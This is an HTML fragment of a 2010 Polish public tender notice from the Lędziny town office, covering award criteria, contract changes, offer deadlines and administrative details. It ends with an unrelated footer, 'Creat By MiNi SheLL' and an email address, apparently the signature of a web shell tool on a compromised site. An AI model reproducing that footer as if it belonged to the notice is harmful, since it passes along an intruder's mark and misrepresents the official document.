<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin realizacji zamówienia:  01.01.2011r. do 15.04.2011r. I od 01.11.2011r. do 31.12.2011r.
Okres ten w zależności od warunków atmosferycznych może ulec skróceniu lub wydłużeniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ledziny.pl/bip/content/show.php?pg=przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Lędziny, 43-143 Lędziny, ul. Lędzińska 55 - pokój 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2010 godzina 09:50, miejsce: Urząd Miasta Lędziny, 43-143 Lędziny, ul. Lędzińska 55 - pokój 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com